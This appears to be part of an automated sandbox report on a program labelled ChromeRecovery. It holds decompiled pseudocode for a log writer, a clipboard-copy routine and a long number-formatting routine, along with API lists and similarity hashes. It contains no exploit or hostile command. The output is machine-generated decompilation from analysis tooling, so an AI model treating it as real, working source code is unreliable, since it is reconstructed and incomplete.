						E00C725A0(_t72, _t98);
						__eflags = _t72;
						if(_t72 != 0) {
							_push(_t98);
							E00C72E0E( *_v160,  &_v192);
						}
						_t74 = GetLastError();
						__eflags = _t74 - 0xb7;
						if(_t74 != 0xb7) {
							_t75 = _v152;
							__eflags =  *((char*)(_t75 + 0xb));
							if( *((char*)(_t75 + 0xb)) != 0) {
								__eflags = 0;
								_v152 = 0;
								WriteFile( *(_t75 + 0x18), 0xca25dc, 2,  &_v152, 0);
							}
						}
						_v156 = 1;
						_t63 = E00C728B6( &_v192);
						goto L7;
					}
					E00C77ED7();
					goto L6;
				} else {
					 *(_t84 + 0x18) = 0;
					L8:
					return E00C7F35B(_v8 ^ _t116);
				}
			}

0x00c741ac
0x00c741b3
0x00c741b7
0x00c741c2
0x00c741c9
0x00c741cc
0x00c741d4
0x00c741da
0x00c741e0
0x00c741eb
0x00c741ee
0x00c741f2
0x00c741f2
0x00c74219
0x00c7421f
0x00c74225
0x00c74230
0x00c74238
0x00c7423d
0x00c74248
0x00c7424b
0x00c74255
0x00c7425b
0x00c7425d
0x00c742ad
0x00c742af
0x00c74264
0x00c74264
0x00c74267
0x00c7426a
0x00c74278
0x00c74281
0x00c74287
0x00c7428a
0x00c7428d
0x00000000
0x00c74292
0x00c742b9
0x00c742bb
0x00000000
0x00000000
0x00c742c3
0x00c742c8
0x00c742cd
0x00c742dd
0x00c742f8
0x00c742fd
0x00c74305
0x00c7430a
0x00c7430c
0x00c7430e
0x00c7431e
0x00c74324
0x00c74325
0x00c7432b
0x00c74330
0x00c74332
0x00c74338
0x00c7433c
0x00c7433e
0x00c74341
0x00c74358
0x00c74358
0x00c7433c
0x00c74364
0x00c7436b
0x00000000
0x00c7436b
0x00c7425f
0x00000000
0x00c74227
0x00c7422b
0x00c74298
0x00c742a6
0x00c742a6

APIs

Part of subcall function 00C75138: GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 00C75165

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000000,00000080,00000000), ref: 00C74219

Part of subcall function 00C743CE: OutputDebugStringW.KERNEL32 ref: 00C743E0
Part of subcall function 00C743CE: MoveFileExW.KERNEL32 ref: 00C74401
Part of subcall function 00C743CE: OutputDebugStringW.KERNEL32 ref: 00C7441F

Part of subcall function 00C77C6B: PathRemoveFileSpecW.SHLWAPI(00000000,?,00000000,00000000,?,?,?,00C7789C,?,?,?,00C7B9ED,00000000,00000068,00000000,00000068), ref: 00C77C8C

GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 00C74255
OutputDebugStringW.KERNEL32 ref: 00C74278
CloseHandle.KERNEL32 ref: 00C74281
GetLastError.KERNEL32 ref: 00C74325
WriteFile.KERNEL32(?,00CA25DC,00000002,?,00000000), ref: 00C74358

Part of subcall function 00C77ED7: GetLastError.KERNEL32 ref: 00C77ED8
Part of subcall function 00C77ED7: RaiseException.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C77F0A

Part of subcall function 00C76CB8: wvsprintfW.USER32(00000000,00000000,00000001), ref: 00C76D50

Strings

LOG_SYSTEM: [%s]: ERROR - Log path %s has a reparse point, xrefs: 00C7426A

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: File$DebugOutputString$AttributesErrorLast$CloseCreateExceptionHandleMovePathRaiseRemoveSpecWritewvsprintf
String ID: LOG_SYSTEM: [%s]: ERROR - Log path %s has a reparse point
API String ID: 1325108685-1149571711
Opcode ID: d270ee3746350579ee5c98a29b10d10d458ec2afd0ff6342c133d602597c6bab
Instruction ID: adfe701e03ba792fc9c05e54b0a2d780f1b7f9fa7a3485c6f425bd6d03770a15
Opcode Fuzzy Hash: d270ee3746350579ee5c98a29b10d10d458ec2afd0ff6342c133d602597c6bab
Instruction Fuzzy Hash: F1517D719002189FEB28DF64DC86FAE77B4EB45300F1081A9F51DA7292DB309E89DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C79029 Relevance: 12.0, APIs: 8, Instructions: 42
clipboardmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C79029(WCHAR* __ecx) {
				int _t4;
				signed int _t13;
				WCHAR* _t16;
				void* _t18;

				_t16 = __ecx;
				_t13 = lstrlenW(__ecx);
				_t4 = OpenClipboard(0);
				if(_t4 != 0) {
					EmptyClipboard();
					_t14 = 2 + _t13 * 2;
					_t18 = GlobalAlloc(0x2002, 2 + _t13 * 2);
					if(GlobalLock(_t18) != 0) {
						E00C80C10(_t7, _t16, _t14);
					}
					GlobalUnlock(_t18);
					if(SetClipboardData(0xd, _t18) == 0) {
						GlobalFree(_t18);
					}
					return CloseClipboard();
				}
				return _t4;
			}

0x00c7902b
0x00c79036
0x00c79038
0x00c79040
0x00c79043
0x00c79049
0x00c7905c
0x00c79067
0x00c7906c
0x00c79071
0x00c79075
0x00c79086
0x00c79089
0x00c79089
0x00c79092
0x00c79092
0x00c7909a

APIs

lstrlenW.KERNEL32 ref: 00C7902E
OpenClipboard.USER32(00000000), ref: 00C79038
EmptyClipboard.USER32(0153BB18,?,?,00C76E11), ref: 00C79043
GlobalAlloc.KERNEL32(00002002,00000000), ref: 00C79056
GlobalLock.KERNEL32 ref: 00C7905F
GlobalUnlock.KERNEL32(00000000,?,?,00C76E11), ref: 00C79075
SetClipboardData.USER32(0000000D,00000000), ref: 00C7907E
GlobalFree.KERNEL32(00000000), ref: 00C79089

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Global$Clipboard$AllocDataEmptyFreeLockOpenUnlocklstrlen
String ID:
API String ID: 3280322382-0
Opcode ID: d2afe9b0c4f8669a74a3883fcd569e5ba3d5fb01f4144e1e5d923071436b160c
Instruction ID: 8266e81d35ec0f3c36b6510a4b99d10fa1556c60454c11a5439f22ab790e98b6
Opcode Fuzzy Hash: d2afe9b0c4f8669a74a3883fcd569e5ba3d5fb01f4144e1e5d923071436b160c
Instruction Fuzzy Hash: 29F0623132AA15EFE7102B71AC4DFAF3B2CEB85756F000227F905C1162DB744905C675

Uniqueness

Uniqueness Score: -1.00%

Function 00C8F428 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E00C8F428(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				char _v1881;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				intOrPtr _v1912;
				signed int* _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				signed int _v1932;
				signed int _v1936;
				char _v1944;
				signed int _v1952;
				signed int _v1956;
				char _v2416;
				signed int _v2420;
				signed int _t785;
				intOrPtr _t795;
				signed int _t802;
				signed int _t808;
				signed int _t813;
				intOrPtr _t819;
				void* _t820;
				signed int _t826;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t838;
				signed int _t840;
				signed int _t841;
				signed int _t846;
				signed int _t847;
				signed int _t852;
				signed int _t854;
				signed int _t855;
				signed int _t862;
				signed int _t863;
				signed int _t871;
				signed int _t874;
				signed int _t879;
				signed int* _t882;
				signed int _t886;
				signed int _t897;
				signed int _t898;
				signed int _t900;
				signed int _t901;
				char* _t902;
				signed int _t905;
				signed int _t911;
				signed int _t913;
				signed int _t917;
				signed int _t925;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t943;
				signed int _t944;
				signed int _t947;
				signed int _t960;
				signed int _t961;
				signed int _t963;
				signed int _t964;
				signed int* _t965;
				signed int _t968;
				signed int* _t971;
				signed int _t974;
				signed int _t976;
				signed int _t981;
				signed int _t989;
				signed int _t992;
				signed int _t996;
				signed int _t999;
				signed int _t1008;
				intOrPtr _t1013;
				signed int _t1014;
				signed int _t1020;
				void* _t1028;
				signed int _t1029;
				signed int _t1030;
				signed int _t1031;
				signed int* _t1034;
				signed int _t1042;
				signed int _t1046;
				signed int _t1048;
				signed int _t1053;
				void* _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1065;
				signed int _t1070;
				signed int _t1071;
				signed int _t1075;
				signed int _t1077;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1090;
				signed int _t1092;
				signed int _t1099;
				intOrPtr* _t1111;
				signed int _t1116;
				signed int _t1117;
				signed int _t1122;
				signed int _t1124;
				signed int _t1125;
				signed int _t1126;
				signed int _t1133;
				signed int _t1137;
				signed int _t1138;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int* _t1144;
				signed int _t1145;
				signed int _t1149;
				signed int _t1150;
				signed int _t1151;
				signed int _t1152;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				signed int _t1161;
				signed int _t1162;
				unsigned int _t1163;
				unsigned int _t1167;
				unsigned int _t1170;
				signed int _t1171;
				signed int _t1174;
				signed int* _t1177;
				signed int _t1180;
				void* _t1182;
				unsigned int _t1183;
				signed int _t1184;
				signed int _t1187;
				signed int* _t1190;
				signed int _t1193;
				signed int _t1198;
				signed int _t1199;
				signed int _t1202;
				signed int _t1204;
				signed int _t1205;
				signed int _t1207;
				char _t1210;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				void* _t1225;
				signed int _t1226;
				signed int _t1228;
				signed int _t1233;
				void* _t1238;
				intOrPtr _t1239;
				void* _t1242;
				unsigned int _t1245;
				signed int _t1246;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1265;
				void* _t1266;
				void* _t1269;
				signed int _t1271;
				signed int _t1275;
				signed int* _t1277;
				signed int _t1281;
				void* _t1282;
				signed int _t1283;
				signed int _t1285;
				signed int _t1286;
				signed int _t1288;
				void* _t1291;
				signed int _t1294;
				signed int _t1295;
				signed int _t1296;
				signed int _t1298;
				signed int _t1299;
				signed int _t1300;
				signed int _t1302;
				signed int _t1310;
				signed int _t1312;
				void* _t1313;
				signed int* _t1314;
				signed int* _t1315;
				signed int _t1321;
				signed int _t1329;

				_t1282 = __esi;
				_t1238 = __edi;
				_t1310 = _t1312;
				_t1313 = _t1312 - 0x970;
				_t785 =  *0xca8008; // 0x617e0cdd
				_v8 = _t785 ^ _t1310;
				_v1932 = _a20;
				_v1888 = _a24;
				E00C91270(__eflags,  &_v1952);
				_t1099 = 1;
				if((_v1952 & 0x0000001f) != 0x1f) {
					E00C912D8(__eflags,  &_v1952);
					_v1944 = 1;
				} else {
					_v1944 = 0;
				}
				_push(_t1282);
				_t1283 = _a8;
				_push(_t1238);
				_t1239 = 0x20;
				_t1321 = _t1283;
				if(_t1321 > 0 || _t1321 >= 0 && _a4 >= 0) {
					_t795 = _t1239;
				} else {
					_t795 = 0x2d;
				}
				_t1111 = _v1932;
				 *_t1111 = _t795;
				 *((intOrPtr*)(_t1111 + 8)) = _v1888;
				E00C84C6C( &_v1956, 0, 0);
				_t1314 = _t1313 + 0xc;
				if((_t1283 & 0x7ff00000) != 0) {
					L12:
					_t802 = E00C8C7DA( &_a4);
					__eflags = _t802;
					if(_t802 == 0) {
						L24:
						_v1936 = _v1936 & 0x00000000;
						_a8 = _t1283 & 0x7fffffff;
						_t1329 = _a4;
						asm("fst qword [ebp-0x774]");
						_t1285 = _v1908;
						_v1928 = _a12 + 1;
						_t1116 = _t1285 >> 0x14;
						_t808 = _t1116 & 0x000007ff;
						__eflags = _t808;
						if(_t808 != 0) {
							_t808 = 0;
							_t41 =  &_v1868;
							 *_t41 = _v1868 & 0;
							__eflags =  *_t41;
						} else {
							_v1868 = _t1099;
						}
						_t1286 = _t1285 & 0x000fffff;
						_v1924 = _v1912 + _t808;
						asm("adc esi, edx");
						_t1117 = _t1116 & 0x000007ff;
						_v1872 = _v1868 + _t1117;
						E00C91330(_t1117, _t1329);
						_push(_t1117);
						_push(_t1117);
						 *_t1314 = _t1329;
						_t813 = E00C93D00(E00C91440(_t1117, _v1912 + _t808), _t1329);
						_v1904 = _t813;
						_t1242 = 0x20;
						__eflags = _t813 - 0x7fffffff;
						if(_t813 == 0x7fffffff) {
							L29:
							__eflags = 0;
							_v1904 = 0;
						} else {
							__eflags = _t813 - 0x80000000;
							if(_t813 == 0x80000000) {
								goto L29;
							}
						}
						_t1198 = _v1872;
						__eflags = _t1286;
						_v468 = _v1924;
						_v464 = _t1286;
						_t1122 = (0 | _t1286 != 0x00000000) + 1;
						_v1868 = _t1122;
						_v472 = _t1122;
						__eflags = _t1198 - 0x433;
						if(_t1198 < 0x433) {
							__eflags = _t1198 - 0x35;
							if(_t1198 == 0x35) {
								L100:
								__eflags = _t1286;
								_t211 =  &_v1908;
								 *_t211 = _v1908 & 0x00000000;
								__eflags =  *_t211;
								_t819 =  *((intOrPtr*)(_t1310 + 4 + (0 | _t1286 != 0x00000000) * 4 - 0x1d4));
								asm("bsr eax, eax");
								if( *_t211 == 0) {
									_t820 = 0;
									__eflags = 0;
								} else {
									_t820 = _t819 + 1;
								}
								__eflags = _t1242 - _t820 - _t1099;
								asm("sbb esi, esi");
								_t1288 =  ~_t1286 + _t1122;
								__eflags = _t1288 - 0x73;
								if(_t1288 <= 0x73) {
									_t1199 = _t1288 - 1;
									__eflags = _t1199 - 0xffffffff;
									if(_t1199 != 0xffffffff) {
										_t1266 = _t1199 - 1;
										while(1) {
											__eflags = _t1199 - _t1122;
											if(_t1199 >= _t1122) {
												_t1008 = 0;
												__eflags = 0;
											} else {
												_t1008 =  *(_t1310 + _t1199 * 4 - 0x1d0);
											}
											__eflags = _t1266 - _t1122;
											if(_t1266 >= _t1122) {
												_t1163 = 0;
												__eflags = 0;
											} else {
												_t1163 =  *(_t1310 + _t1199 * 4 - 0x1d4);
											}
											 *(_t1310 + _t1199 * 4 - 0x1d0) = _t1163 >> 0x0000001f | _t1008 + _t1008;
											_t1199 = _t1199 - 1;
											_t1266 = _t1266 - 1;
											__eflags = _t1199 - 0xffffffff;
											if(_t1199 == 0xffffffff) {
												goto L115;
											}
											_t1122 = _v472;
										}
									}
									L115:
									_v472 = _t1288;
								} else {
									_v1400 = _v1400 & 0x00000000;
									_v472 = _v472 & 0x00000000;
									E00C8A434( &_v468, 0x1cc,  &_v1396, 0);
									_t1314 =  &(_t1314[4]);
								}
								_t1245 = 0x434 >> 5;
								E00C81190(0x434 >> 5,  &_v1396, 0, 0x434);
								__eflags = 1;
								 *(_t1310 + 0xbad63d) = 1 << (0x00000434 - _v1872 & 0x0000001f);
							} else {
								_v1396 = _v1396 & 0x00000000;
								_v1392 = 0x100000;
								_v1400 = 2;
								__eflags = _t1286;
								if(_t1286 != 0) {
									_t1225 = 0;
									__eflags = 0;
									while(1) {
										_t1013 =  *((intOrPtr*)(_t1310 + _t1225 - 0x570));
										__eflags = _t1013 -  *((intOrPtr*)(_t1310 + _t1225 - 0x1d0));
										if(_t1013 !=  *((intOrPtr*)(_t1310 + _t1225 - 0x1d0))) {
											goto L100;
										}
										_t1225 = _t1225 + 4;
										__eflags = _t1225 - 8;
										if(_t1225 != 8) {
											continue;
										} else {
											__eflags = 0;
											asm("bsr eax, esi");
											_v1908 = 0;
											if(0 == 0) {
												_t1014 = 0;
											} else {
												_t1014 = _t1013 + 1;
											}
											__eflags = _t1242 - _t1014 - 2;
											asm("sbb esi, esi");
											_t1302 =  ~_t1286 + _t1122;
											__eflags = _t1302 - 0x73;
											if(_t1302 <= 0x73) {
												_t1226 = _t1302 - 1;
												__eflags = _t1226 - 0xffffffff;
												if(_t1226 != 0xffffffff) {
													_t1269 = _t1226 - 1;
													while(1) {
														__eflags = _t1226 - _t1122;
														if(_t1226 >= _t1122) {
															_t1020 = 0;
														} else {
															_t1020 =  *(_t1310 + _t1226 * 4 - 0x1d0);
														}
														__eflags = _t1269 - _t1122;
														if(_t1269 >= _t1122) {
															_t1167 = 0;
														} else {
															_t1167 =  *(_t1310 + _t1226 * 4 - 0x1d4);
														}
														 *(_t1310 + _t1226 * 4 - 0x1d0) = _t1167 >> 0x0000001e | _t1020 << 0x00000002;
														_t1226 = _t1226 - 1;
														_t1269 = _t1269 - 1;
														__eflags = _t1226 - 0xffffffff;
														if(_t1226 == 0xffffffff) {
															goto L98;
														}
														_t1122 = _v472;
													}
												}
												L98:
												_v472 = _t1302;
											} else {
												_v1400 = 0;
												_v472 = 0;
												E00C8A434( &_v468, 0x1cc,  &_v1396, 0);
												_t1314 =  &(_t1314[4]);
											}
											_t1245 = 0x435 >> 5;
											E00C81190(0x435 >> 5,  &_v1396, 0, 0x435);
											 *(_t1310 + 0xbad63d) = 1 << (0x00000435 - _v1872 & 0x0000001f);
										}
										goto L117;
									}
								}
								goto L100;
							}
							L117:
							_t826 = _t1245 + 1;
							_t1291 = 0x1cc;
							_v1400 = _t826;
							_v936 = _t826;
							E00C8A434( &_v932, 0x1cc,  &_v1396, _t826 << 2);
							_t1315 =  &(_t1314[7]);
							_t1099 = 1;
							__eflags = 1;
						} else {
							_v1396 = _v1396 & 0x00000000;
							_v1392 = 0x100000;
							_v1400 = 2;
							__eflags = _t1286;
							if(_t1286 == 0) {
								L57:
								_t1170 = _t1198 - 0x432;
								_t1171 = _t1170 & 0x0000001f;
								_v1880 = _t1170 >> 5;
								_v1896 = _t1171;
								_v1924 = _t1242 - _t1171;
								_t1028 = E00C93C90(_t1099, _t1242 - _t1171, 0);
								_t1228 = _v1868;
								_t1029 = _t1028 - 1;
								_t130 =  &_v1908;
								 *_t130 = _v1908 & 0x00000000;
								__eflags =  *_t130;
								_v1876 = _t1029;
								_t1030 =  !_t1029;
								_v1920 = _t1030;
								asm("bsr eax, ecx");
								if( *_t130 == 0) {
									_t138 =  &_v1868;
									 *_t138 = _v1868 & 0x00000000;
									__eflags =  *_t138;
								} else {
									_v1868 = _t1030 + 1;
								}
								_t1174 = _v1880;
								_t1291 = 0x1cc;
								_t1031 = _t1174 + _t1228;
								__eflags = _t1031 - 0x73;
								if(_t1031 <= 0x73) {
									__eflags = _t1242 - _v1868 - _v1896;
									asm("sbb eax, eax");
									_t1034 =  ~_t1031 + _t1174 + _t1228;
									_v1916 = _t1034;
									__eflags = _t1034 - 0x73;
									if(_t1034 > 0x73) {
										goto L61;
									} else {
										_t1271 = _t1174 - 1;
										_t1042 = _t1034 - 1;
										_v1900 = _t1271;
										_v1872 = _t1042;
										__eflags = _t1042 - _t1271;
										if(_t1042 != _t1271) {
											_t1275 = _t1042 - _t1174;
											__eflags = _t1275;
											_t1177 =  &(( &_v472)[_t1275]);
											_v1892 = _t1177;
											while(1) {
												__eflags = _t1275 - _t1228;
												if(_t1275 >= _t1228) {
													_t1046 = 0;
													__eflags = 0;
												} else {
													_t1046 = _t1177[1];
												}
												_v1868 = _t1046;
												_t158 = _t1275 - 1; // -4
												__eflags = _t158 - _t1228;
												if(_t158 >= _t1228) {
													_t1048 = 0;
													__eflags = 0;
												} else {
													_t1048 =  *_t1177;
												}
												_t1180 = _v1872;
												 *(_t1310 + _t1180 * 4 - 0x1d0) = (_t1048 & _v1920) >> _v1924 | (_v1868 & _v1876) << _v1896;
												_t1053 = _t1180 - 1;
												_t1177 = _v1892 - 4;
												_v1872 = _t1053;
												_t1275 = _t1275 - 1;
												_v1892 = _t1177;
												__eflags = _t1053 - _v1900;
												if(_t1053 == _v1900) {
													break;
												}
												_t1228 = _v472;
											}
											_t1174 = _v1880;
										}
										__eflags = _t1174;
										if(_t1174 != 0) {
											__eflags = 0;
											memset( &_v468, 0, _t1174 << 2);
											_t1314 =  &(_t1314[3]);
										}
										_v472 = _v1916;
									}
								} else {
									L61:
									_v1400 = 0;
									_v472 = 0;
									E00C8A434( &_v468, _t1291,  &_v1396, 0);
									_t1314 =  &(_t1314[4]);
								}
								_v1396 = 2;
								_push(4);
							} else {
								_t1182 = 0;
								__eflags = 0;
								while(1) {
									__eflags =  *((intOrPtr*)(_t1310 + _t1182 - 0x570)) -  *((intOrPtr*)(_t1310 + _t1182 - 0x1d0));
									if( *((intOrPtr*)(_t1310 + _t1182 - 0x570)) !=  *((intOrPtr*)(_t1310 + _t1182 - 0x1d0))) {
										goto L57;
									}
									_t1182 = _t1182 + 4;
									__eflags = _t1182 - 8;
									if(_t1182 != 8) {
										continue;
									} else {
										_t1183 = _t1198 - 0x431;
										_t1184 = _t1183 & 0x0000001f;
										_v1880 = _t1183 >> 5;
										_v1896 = _t1184;
										_v1876 = _t1242 - _t1184;
										_t1059 = E00C93C90(_t1099, _t1242 - _t1184, 0);
										_t1233 = _v1868;
										_t1060 = _t1059 - 1;
										_t70 =  &_v1908;
										 *_t70 = _v1908 & 0x00000000;
										__eflags =  *_t70;
										_v1900 = _t1060;
										_t1061 =  !_t1060;
										_v1924 = _t1061;
										asm("bsr eax, ecx");
										if( *_t70 == 0) {
											_t78 =  &_v1868;
											 *_t78 = _v1868 & 0x00000000;
											__eflags =  *_t78;
										} else {
											_v1868 = _t1061 + 1;
										}
										_t1187 = _v1880;
										_t1291 = 0x1cc;
										_t1062 = _t1187 + _t1233;
										__eflags = _t1062 - 0x73;
										if(_t1062 <= 0x73) {
											__eflags = _t1242 - _v1868 - _v1896;
											asm("sbb eax, eax");
											_t1065 =  ~_t1062 + _t1187 + _t1233;
											_v1920 = _t1065;
											__eflags = _t1065 - 0x73;
											if(_t1065 > 0x73) {
												goto L39;
											} else {
												_t1277 = _t1187 - 1;
												_t1071 = _t1065 - 1;
												_v1916 = _t1277;
												_v1872 = _t1071;
												__eflags = _t1071 - _t1277;
												if(_t1071 != _t1277) {
													_t1281 = _t1071 - _t1187;
													__eflags = _t1281;
													_t1190 =  &(( &_v472)[_t1281]);
													_v1892 = _t1190;
													while(1) {
														__eflags = _t1281 - _t1233;
														if(_t1281 >= _t1233) {
															_t1075 = 0;
															__eflags = 0;
														} else {
															_t1075 = _t1190[1];
														}
														_v1868 = _t1075;
														_t98 = _t1281 - 1; // -4
														__eflags = _t98 - _t1233;
														if(_t98 >= _t1233) {
															_t1077 = 0;
															__eflags = 0;
														} else {
															_t1077 =  *_t1190;
														}
														_t1193 = _v1872;
														 *(_t1310 + _t1193 * 4 - 0x1d0) = (_t1077 & _v1924) >> _v1876 | (_v1868 & _v1900) << _v1896;
														_t1082 = _t1193 - 1;
														_t1190 = _v1892 - 4;
														_v1872 = _t1082;
														_t1281 = _t1281 - 1;
														_v1892 = _t1190;
														__eflags = _t1082 - _v1916;
														if(_t1082 == _v1916) {
															break;
														}
														_t1233 = _v472;
													}
													_t1187 = _v1880;
												}
												__eflags = _t1187;
												if(_t1187 != 0) {
													__eflags = 0;
													memset( &_v468, 0, _t1187 << 2);
													_t1314 =  &(_t1314[3]);
												}
												_v472 = _v1920;
											}
										} else {
											L39:
											_v1400 = 0;
											_v472 = 0;
											E00C8A434( &_v468, _t1291,  &_v1396, 0);
											_t1314 =  &(_t1314[4]);
										}
										_t1070 = 4;
										_v1396 = _t1070;
										_push(_t1070);
									}
									goto L56;
								}
								goto L57;
							}
							L56:
							_v1392 = _v1392 & 0x00000000;
							_push( &_v1396);
							_v936 = _t1099;
							_push(_t1291);
							_push( &_v932);
							_v1400 = _t1099;
							E00C8A434();
							_t1315 =  &(_t1314[4]);
						}
						_t831 = _v1904;
						_t1124 = 0xa;
						_v1924 = _t1124;
						__eflags = _t831;
						if(_t831 < 0) {
							_t832 =  ~_t831;
							_t833 = _t832 / _t1124;
							_v1916 = _t833;
							_t1125 = _t832 % _t1124;
							_v1908 = _t1125;
							__eflags = _t833;
							if(_t833 == 0) {
								L250:
								__eflags = _t1125;
								if(_t1125 != 0) {
									_t879 =  *(0xc9b0b4 + _t1125 * 4);
									_v1908 = _t879;
									__eflags = _t879;
									if(_t879 == 0) {
										L262:
										__eflags = 0;
										_push(0);
										_v472 = 0;
										_v2420 = 0;
										goto L263;
									} else {
										__eflags = _t879 - _t1099;
										if(_t879 != _t1099) {
											_t1140 = _v472;
											__eflags = _t1140;
											if(_t1140 != 0) {
												_v1876 = _v1876 & 0x00000000;
												_t1252 = 0;
												__eflags = 0;
												do {
													_t1214 = _t879 *  *(_t1310 + _t1252 * 4 - 0x1d0) >> 0x20;
													 *(_t1310 + _t1252 * 4 - 0x1d0) = _t879 *  *(_t1310 + _t1252 * 4 - 0x1d0) + _v1876;
													_t879 = _v1908;
													asm("adc edx, 0x0");
													_t1252 = _t1252 + 1;
													_v1876 = _t1214;
													__eflags = _t1252 - _t1140;
												} while (_t1252 != _t1140);
												__eflags = _t1214;
												if(_t1214 != 0) {
													_t886 = _v472;
													__eflags = _t886 - 0x73;
													if(_t886 >= 0x73) {
														goto L262;
													} else {
														 *(_t1310 + _t886 * 4 - 0x1d0) = _t1214;
														_v472 = _v472 + 1;
													}
												}
											}
										}
									}
								}
							} else {
								do {
									__eflags = _t833 - 0x26;
									if(_t833 > 0x26) {
										_t833 = 0x26;
									}
									_t1141 =  *(0xc9b01e + _t833 * 4) & 0x000000ff;
									_v1880 = _t833;
									_v1400 = ( *(0xc9b01f + _t833 * 4) & 0x000000ff) + ( *(0xc9b01e + _t833 * 4) & 0x000000ff);
									E00C81190(_t1141 << 2,  &_v1396, 0, _t1141 << 2);
									_t897 = E00C80C10( &(( &_v1396)[_t1141]), 0xc9a718 + ( *(0xc9b01c + _v1880 * 4) & 0x0000ffff) * 4, ( *(0xc9b01f + _t833 * 4) & 0x000000ff) << 2);
									_t1215 = _v1400;
									_t1315 =  &(_t1315[6]);
									_v1872 = _t1215;
									__eflags = _t1215 - _t1099;
									if(_t1215 > _t1099) {
										__eflags = _v472 - _t1099;
										if(_v472 > _t1099) {
											__eflags = _t1215 - _v472;
											_t1294 =  &_v1396;
											_t547 = _t1215 - _v472 > 0;
											__eflags = _t547;
											_t898 = _t897 & 0xffffff00 | _t547;
											if(_t547 >= 0) {
												_t1294 =  &_v468;
											}
											_v1892 = _t1294;
											__eflags = _t898;
											if(_t898 == 0) {
												_v1896 = _t1215;
												_t1215 = _v472;
												_v1872 = _t1215;
												_v1876 =  &_v1396;
											} else {
												_v1896 = _v472;
												_v1876 =  &_v468;
											}
											_t900 = 0;
											_t1255 = 0;
											_v1864 = 0;
											__eflags = _t1215;
											if(_t1215 == 0) {
												L244:
												_v472 = _t900;
												_t1291 = 0x1cc;
												_t901 = _t900 << 2;
												__eflags = _t901;
												_push(_t901);
												_t902 =  &_v1860;
												goto L245;
											} else {
												do {
													__eflags =  *(_t1294 + _t1255 * 4);
													if( *(_t1294 + _t1255 * 4) != 0) {
														_t1142 = 0;
														_t1295 = _t1255;
														_v1868 = 0;
														_v1900 = 0;
														__eflags = _v1896;
														if(_v1896 != 0) {
															_t1216 = 0;
															while(1) {
																__eflags = _t1295 - 0x73;
																if(_t1295 == 0x73) {
																	break;
																}
																__eflags = _t1295 - _t900;
																if(_t1295 == _t900) {
																	 *(_t1310 + _t1295 * 4 - 0x740) =  *(_t1310 + _t1295 * 4 - 0x740) & 0x00000000;
																	_t579 = _t1255 + 1; // 0x1
																	_t917 = _t579 + _t1142;
																	__eflags = _t917;
																	_v1864 = _t917;
																}
																_t913 =  *(_v1876 + _t1142 * 4);
																_t1145 = _v1892;
																_t1216 = _t913 *  *(_t1145 + _t1255 * 4) >> 0x20;
																asm("adc edx, 0x0");
																 *(_t1310 + _t1295 * 4 - 0x740) =  *(_t1310 + _t1295 * 4 - 0x740) + _t913 *  *(_t1145 + _t1255 * 4) + _v1868;
																_t900 = _v1864;
																asm("adc edx, 0x0");
																_t1142 = _v1900 + 1;
																_t1295 = _t1295 + 1;
																_v1868 = _t1216;
																_v1900 = _t1142;
																__eflags = _t1142 - _v1896;
																if(_t1142 != _v1896) {
																	continue;
																}
																break;
															}
															__eflags = _t1216;
															if(_t1216 != 0) {
																_t1144 =  &_v1860 + _t1295 * 4;
																_v1868 = _t1144;
																while(1) {
																	__eflags = _t1295 - 0x73;
																	if(_t1295 == 0x73) {
																		goto L240;
																	}
